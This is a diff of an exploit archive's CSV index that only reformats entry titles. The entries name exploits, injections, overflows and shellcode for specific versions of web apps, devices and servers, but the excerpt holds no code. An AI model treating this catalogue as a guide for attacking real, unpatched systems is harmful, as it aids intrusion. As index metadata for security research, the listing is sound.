id,file,description,date,author,platform,type,port 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337 -35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 +35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 35304,platforms/multiple/dos/35304.txt,"Oracle Java Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 @@ -31815,7 +31815,7 @@ id,file,description,date,author,platform,type,port 35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - (.pcap) Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 -35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 +35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution",2011-02-07,d3c0der,windows,remote,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 @@ -31836,7 +31836,7 @@ id,file,description,date,author,platform,type,port 35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 - 'register.php' SQL Injection",2011-02-10,"High-Tech Bridge SA",php,webapps,0 35335,platforms/php/webapps/35335.html,"Drupal CAPTCHA Module - Security Bypass",2011-02-11,anonymous,php,webapps,0 35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 - index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 -35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 +35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 - print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 35340,platforms/php/webapps/35340.txt,"WordPress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 @@ -31855,18 +31855,18 @@ id,file,description,date,author,platform,type,port 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' NULL Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 -35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 Command Injection",2014-11-24,"Core Security",cgi,webapps,80 +35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 -35361,platforms/php/webapps/35361.txt,"Escort Directory CMS SQL Injection",2011-02-19,NoNameMT,php,webapps,0 +35361,platforms/php/webapps/35361.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80 -35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 +35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0 35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 @@ -32088,7 +32088,7 @@ id,file,description,date,author,platform,type,port 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injection",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - (.m3u8) Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 -35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 Memory Corruption Denial Of Service",2011-04-13,waKKu,multiple,dos,0 +35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption Denial Of Service",2011-04-13,waKKu,multiple,dos,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 @@ -32138,9 +32138,9 @@ id,file,description,date,author,platform,type,port 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection and Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 +35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 -35668,platforms/php/webapps/35668.txt,"up.time Software 5 Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps,0 +35668,platforms/php/webapps/35668.txt,"up.time Software 5 - Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps,0 35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,Metasploit,windows,local,0 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 @@ -32168,7 +32168,7 @@ id,file,description,date,author,platform,type,port 35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 -35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 +35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account and Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",jsp,webapps,0 35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 - 'news.php' SQL Injection",2011-05-07,KedAns-Dz,php,webapps,0 @@ -32262,8 +32262,8 @@ id,file,description,date,author,platform,type,port 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 -35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 -35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 +35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 +35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 @@ -32317,17 +32317,17 @@ id,file,description,date,author,platform,type,port 35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0 35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0 35855,platforms/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote,0 -35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service",2011-06-14,echo,multiple,dos,0 +35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos,0 35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection",2015-01-21,TranDinhTien,php,webapps,0 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0 35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80 35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 35862,platforms/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 -35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection",2011-06-15,"Robin Verton",php,webapps,0 +35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 - HTML-injection and SQL Injection",2011-06-15,"Robin Verton",php,webapps,0 35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection",2011-06-19,KedAns-Dz,php,webapps,0 -35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross-Site Scripting and SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 +35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 @@ -32433,7 +32433,7 @@ id,file,description,date,author,platform,type,port 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 -35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 +35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 @@ -32481,7 +32481,7 @@ id,file,description,date,author,platform,type,port 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 -36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 +36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 @@ -32508,8 +32508,8 @@ id,file,description,date,author,platform,type,port 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu - 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 -36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 Cross-Site Scripting and SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 -36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 +36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 - Cross-Site Scripting and SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 +36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 @@ -32521,7 +32521,7 @@ id,file,description,date,author,platform,type,port 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 -36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 +36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / XSS",2015-02-16,"Kacper Szurek",php,webapps,0 @@ -32548,13 +32548,13 @@ id,file,description,date,author,platform,type,port 36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 -36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 +36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 -36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting and SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 +36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 36122,platforms/php/webapps/36122.txt,"SkaDate - 'blogs.php' Cross-Site Scripting",2011-09-08,sonyy,php,webapps,0 @@ -32592,7 +32592,7 @@ id,file,description,date,author,platform,type,port 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 -36158,platforms/php/dos/36158.txt,"PHP DateTime Use After Free",2015-02-23,"Taoguang Chen",php,dos,0 +36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF",2015-02-23,"Eric Flokstra",php,webapps,80 @@ -32652,15 +32652,15 @@ id,file,description,date,author,platform,type,port 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 -36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 -36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 -36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 +36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 - addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 +36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 - addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 +36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 - adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 -36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 +36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 @@ -32669,11 +32669,11 @@ id,file,description,date,author,platform,type,port 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 -36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow and Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 +36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps,0 -36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 +36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices - Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 